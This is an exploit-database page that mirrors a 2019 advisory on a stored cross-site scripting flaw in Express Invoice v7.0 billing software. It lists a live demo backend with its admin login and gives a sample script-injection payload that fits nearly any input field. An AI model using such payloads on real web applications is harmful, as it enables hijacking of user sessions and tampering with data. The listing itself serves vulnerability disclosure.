Advertisement






Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection

CVE Category Price Severity
N/A CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-23
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040204

Below is a copy:

Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection
[*] :: Title: Express Invoice - The Complete Billing Software v7.0 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-23
[*] :: Software: Express Invoice - The Complete Billing Software v7.0
  
[?] :: Technical Details & Description:
# Weak security measures like no input fields data filtering has been discovered in the Express Invoice - The Complete Billing Software. Current version of this web-application is 7.0.

[?] :: Demo Website:
# https://codecanyon.net/item/express-invoice-with-stock-account-solutions/15467114
# Backend: http://billing.ultimatekode.com/demo/
# Login: admin, Password: 123456

[!] :: PoC Stored XSS Injection:
# http://billing.ultimatekode.com/demo/

[+] :: PoC [Stored XSS Injection]:
# Authorize on the demo website for tests: http://billing.ultimatekode.com/demo/ (login / password is admin / 123456). This web-application have no security measures or filters to prevent XSS Injections, so you can do what u want and add your payload almost in each input field you see. No limits :)
# Sample payload: "><script>alert('QUIXSS')</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.